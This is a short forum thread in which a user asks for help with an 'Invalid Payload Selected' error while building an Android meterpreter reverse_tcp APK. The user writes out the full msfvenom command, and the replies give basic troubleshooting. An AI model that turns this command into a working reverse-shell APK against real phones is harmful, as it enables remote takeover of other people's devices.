Forum Thread: Hey Guyz, Need Help on Metasploit Payload

i am trying to generate metasploit payload of reverse_tcp for android
but i am stuck on the error "Error: Invalid Payload Selected"
please give any helpful suggestions to solve it!
i'll really appriciate it
THANKS IN ADVANCE! :)

6 Responses

Make sure you wrote the name of the payload right when you choose it.

yes @MANO DON
i have wrote name correctly!
but it won't sovle it! :(
THANKS FOR REPLY! :)

Not all payloads are compatible with some exploits. What exploit are you trying to use? And are you trying to get a normal shell or Meterpreter on the machine?

THANKS FOR THE REPLY
@CHRISTIAN HERMAN
my scenario is like
input=>>msfvenom -p android/meterpreter/reverse_tcp LHOST="ip " LPORT='port_num(eg.444)' R > /root/Desktop/payload.apk
it tooks around 10 secs to respond and generate output like
INVALID PAYLOAD SELECTED
if there is any detail that i didn't provide regarding to this then tell me!
i want to solve it!
Thanks :) !

So you didn't choose an exploit yet? Maybe try doing that first, not sure if that would work.

Okay, i''ll do it first !
If work then i'll inform you!
Thanks :)

Share Your Thoughts

  • Hot
  • Active